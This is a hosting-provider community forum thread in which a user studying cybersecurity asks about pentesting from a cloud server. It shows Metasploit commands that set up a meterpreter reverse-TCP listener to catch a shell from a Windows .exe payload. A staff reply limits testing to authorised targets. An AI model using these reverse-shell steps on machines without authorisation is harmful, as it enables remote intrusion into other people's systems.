Can I use the server as a pentest server?

I have tried it ,but when using metasploit framework,and I cannot get the data back to my server when using

use exploit/multi/handler
set payload windows/meterpreter_reverse_tcp
set LHOST my_server_ip
set LPORT 3333
exploit -j

and when I use the .exe file on the windows,but I cannot get the data back.

2 Replies

You can certainly use your Linode for Pen-testing, though there are a few ground rules.

Guidelines

We ask that you limit testing to your own server or those which you've been given permission test on.

Testing that causes performance issues to other Linode Customers or causes us to receive abuse complaints may be mitigated.

Additional Info

While I don't have much experience with Metasploit, I've used the Katoolin Package on my own Linode in the past and found it to be a pretty seamless install and would recommend checking it out as a possible alternative. I'll throw a link to some Metasploit documentation and the Katoolin Package below.

Metasploit
Katoolin

Security Researchers

If Penetration Testing is part of your business or something that you plan on doing regularly, I recommend reaching out to our support team to see about getting vetted as a security researcher.

Thats great news. I am currently doing a couple of Cyber Security courses, and while I have my own VM's it is impossible to do these tests on my own connection.

I've just signed up today, so hearing this means I can enjoy the free $100 credit for the next couple of months, before deciding if Im here to stay. (though research tells me this is the place to be for external servers)

Cheers,

Uncle Jay

Reply

Please enter an answer
Tips:

You can mention users to notify them: @username

You can use Markdown to format your question. For more examples see the Markdown Cheatsheet.

> I’m a blockquote.

I’m a blockquote.

[I'm a link] (https://www.google.com)

I'm a link

**I am bold** I am bold

*I am italicized* I am italicized

Community Code of Conduct